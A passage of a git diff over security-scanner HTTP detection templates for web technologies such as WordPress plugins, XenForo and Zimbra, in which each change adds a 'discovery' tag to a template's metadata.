100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200,discovery http: - method: GET diff --git a/http/technologies/wordpress/themes/wordpress-theme-detect.yaml b/http/technologies/wordpress/themes/wordpress-theme-detect.yaml index a91d24ef8a4..47f339317f1 100644 --- a/http/technologies/wordpress/themes/wordpress-theme-detect.yaml +++ b/http/technologies/wordpress/themes/wordpress-theme-detect.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: - http.component:"wordpress" - tags: tech,wp,wordpress,theme,detection,wp-theme + tags: tech,wp,wordpress,theme,detection,wp-theme,discovery http: - method: GET diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index 9f40b226bbb..ccdaef66f39 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -16,7 +16,7 @@ info: vendor: bricksbuilder product: bricks publicwww-query: "/wp-content/themes/bricks/" - tags: wordpress,theme,wp-theme,wp,bricks + tags: wordpress,theme,wp-theme,wp,bricks,discovery http: - method: GET diff --git a/http/technologies/workerman-websocket-detect.yaml b/http/technologies/workerman-websocket-detect.yaml index 337829466c1..35c0764be11 100644 --- a/http/technologies/workerman-websocket-detect.yaml +++ b/http/technologies/workerman-websocket-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "workerman" - tags: tech,workerman,websocket + tags: tech,workerman,websocket,discovery http: - method: GET diff --git a/http/technologies/writebook-detect.yaml b/http/technologies/writebook-detect.yaml index 09790ca0d26..1359e2c220d 100644 --- a/http/technologies/writebook-detect.yaml +++ b/http/technologies/writebook-detect.yaml @@ -11,7 +11,7 @@ info: max-request: 1 verified: true shodan-query: html:"Writebook" - tags: writebook,tech + tags: writebook,tech,discovery http: - method: GET diff --git a/http/technologies/wso2-products-detect.yaml b/http/technologies/wso2-products-detect.yaml index 55251431e9d..d350838c5e2 100644 --- a/http/technologies/wso2-products-detect.yaml +++ b/http/technologies/wso2-products-detect.yaml @@ -7,7 +7,7 @@ info: description: Try to detect the presence of a WSO2 products instance via the version endpoint metadata: max-request: 1 - tags: tech,wso2 + tags: tech,wso2,discovery http: - method: GET diff --git a/http/technologies/wuzhicms-detect.yaml b/http/technologies/wuzhicms-detect.yaml index 5dbae774022..2e63a299079 100644 --- a/http/technologies/wuzhicms-detect.yaml +++ b/http/technologies/wuzhicms-detect.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,wuzhicms + tags: tech,wuzhicms,discovery http: - method: GET diff --git a/http/technologies/xenforo-detect.yaml b/http/technologies/xenforo-detect.yaml index 7052daea710..8ded12765db 100644 --- a/http/technologies/xenforo-detect.yaml +++ b/http/technologies/xenforo-detect.yaml @@ -11,7 +11,7 @@ info: vendor: xenforo product: xenforo shodan-query: http.title:"XenForo" - tags: tech,xenforo + tags: tech,xenforo,discovery http: - method: GET diff --git a/http/technologies/xerox-workcentre-detect.yaml b/http/technologies/xerox-workcentre-detect.yaml index 2130a909650..8ec247eedf0 100644 --- a/http/technologies/xerox-workcentre-detect.yaml +++ b/http/technologies/xerox-workcentre-detect.yaml @@ -12,7 +12,7 @@ info: vendor: xerox product: workcentre_7970i shodan-query: title:"XEROX WORKCENTRE" - tags: tech,xerox,workcentre + tags: tech,xerox,workcentre,discovery http: - method: GET diff --git a/http/technologies/yapi-detect.yaml b/http/technologies/yapi-detect.yaml index 9f482c329fc..667dda54d76 100644 --- a/http/technologies/yapi-detect.yaml +++ b/http/technologies/yapi-detect.yaml @@ -11,7 +11,7 @@ info: vendor: ymfe product: yapi shodan-query: http.title:"YApi" - tags: tech,yapi + tags: tech,yapi,discovery http: - method: GET diff --git a/http/technologies/yeswiki-detect.yaml b/http/technologies/yeswiki-detect.yaml index 6d99bbb2df7..c2abbd89272 100644 --- a/http/technologies/yeswiki-detect.yaml +++ b/http/technologies/yeswiki-detect.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.html:"yeswiki" product: yeswiki vendor: yeswiki - tags: yeswiki,panel,tech + tags: yeswiki,panel,tech,discovery http: - method: GET diff --git a/http/technologies/ymhome-detect.yaml b/http/technologies/ymhome-detect.yaml index 98d4e5eb037..a7fa1827193 100644 --- a/http/technologies/ymhome-detect.yaml +++ b/http/technologies/ymhome-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: app="一米OA" - tags: ymhome,tech + tags: ymhome,tech,discovery http: - method: GET diff --git a/http/technologies/yourls-detect.yaml b/http/technologies/yourls-detect.yaml index 4284db58bb8..5580321705c 100644 --- a/http/technologies/yourls-detect.yaml +++ b/http/technologies/yourls-detect.yaml @@ -17,7 +17,7 @@ info: product: yourls shodan-query: title:"Your Own URL Shortener" fofa-query: title="Your Own URL Shortener" - tags: tech,yourls + tags: tech,yourls,discovery http: - method: GET diff --git a/http/technologies/zap-api-detect.yaml b/http/technologies/zap-api-detect.yaml index 8fd520c6eb1..4cd76d766d1 100644 --- a/http/technologies/zap-api-detect.yaml +++ b/http/technologies/zap-api-detect.yaml @@ -8,7 +8,7 @@ info: - https://www.zaproxy.org/docs/api/ metadata: max-request: 1 - tags: zap,tech + tags: zap,tech,discovery http: - method: GET diff --git a/http/technologies/zend-server-test-page.yaml b/http/technologies/zend-server-test-page.yaml index 03a52179a04..ce30eed4789 100644 --- a/http/technologies/zend-server-test-page.yaml +++ b/http/technologies/zend-server-test-page.yaml @@ -12,7 +12,7 @@ info: vendor: zend product: zend_server shodan-query: title:"Zend Server Test Page" - tags: tech,zend + tags: tech,zend,discovery http: - method: GET diff --git a/http/technologies/zerof-webserver-detect.yaml b/http/technologies/zerof-webserver-detect.yaml index c55d2695891..259373b5ef6 100644 --- a/http/technologies/zerof-webserver-detect.yaml +++ b/http/technologies/zerof-webserver-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,zerof + tags: tech,zerof,discovery http: - method: GET diff --git a/http/technologies/zimbra-detect.yaml b/http/technologies/zimbra-detect.yaml index 468bae8f059..1edc7d566c5 100644 --- a/http/technologies/zimbra-detect.yaml +++ b/http/technologies/zimbra-detect.yaml @@ -7,7 +7,7 @@ info: description: Send a GET request to js file on Zimbra server to obtain version information metadata: max-request: 1 - tags: tech,zimbra + tags: tech,zimbra,discovery http: - method: GET diff --git a/http/technologies/zk-framework-detect.yaml b/http/technologies/zk-framework-detect.yaml index cf1fe9403c3..a9a67b2e257 100644 --- a/http/technologies/zk-framework-detect.yaml +++ b/http/technologies/zk-framework-detect.yaml @@ -16,7 +16,7 @@ info: product: zk_framework shodan-query: http.html:"zk.wpd" OR http.html:"